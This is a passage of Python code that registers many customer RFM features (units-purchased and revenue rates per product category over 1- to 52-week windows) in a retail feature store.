fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_8W', desc='Last 8 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"8"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_16W', desc='Last 16 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"16"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_32W', desc='Last 32 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"32"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_52W', desc='Last 52 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"52"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_1W', desc='Last weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Home","TimeGranularity":"Week","WindowLength":"1"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_2W', desc='Last 2 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_4W', desc='Last 4 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_8W', desc='Last 8 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_16W', desc='Last 16 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_32W', desc='Last 32 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_52W', desc='Last 52 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_1W', desc='Last weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_2W', desc='Last 2 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_4W', desc='Last 4 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_8W', desc='Last 8 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_16W', desc='Last 16 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_32W', desc='Last 32 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_52W', desc='Last 52 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_1W', desc='Last weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_2W', desc='Last 2 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_4W', desc='Last 4 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_8W', desc='Last 8 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_16W', desc='Last 16 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_32W', desc='Last 32 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_52W', desc='Last 52 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_1W', desc='Last weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_2W', desc='Last 2 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_4W', desc='Last 4 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_8W', desc='Last 8 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_16W', desc='Last 16 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_32W', desc='Last 32 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_52W', desc='Last 52 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_1W', desc='Last weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_2W', desc='Last 2 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_4W', desc='Last 4 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_8W', desc='Last 8 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_16W', desc='Last 16 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_32W', desc='Last 32 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_52W', desc='Last 52 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_1W', desc='Last weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_2W', desc='Last 2 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_4W', desc='Last 4 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_8W', desc='Last 8 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_16W', desc='Last 16 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_32W', desc='Last 32 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_52W', desc='Last 52 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_1W', desc='Last weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_2W', desc='Last 2 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_4W', desc='Last 4 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_8W', desc='Last 8 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_16W', desc='Last 16 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_32W', desc='Last 32 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_52W', desc='Last 52 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_1W', desc='Last weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_2W', desc='Last 2 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_4W', desc='Last 4 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_8W', desc='Last 8 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_16W', desc='Last 16 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_32W', desc='Last 32 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_52W', desc='Last 52 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_1W', desc='Last weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_2W', desc='Last 2 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_4W', desc='Last 4 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_8W', desc='Last 8 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_16W', desc='Last 16 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_32W', desc='Last 32 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_52W', desc='Last 52 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","4"])
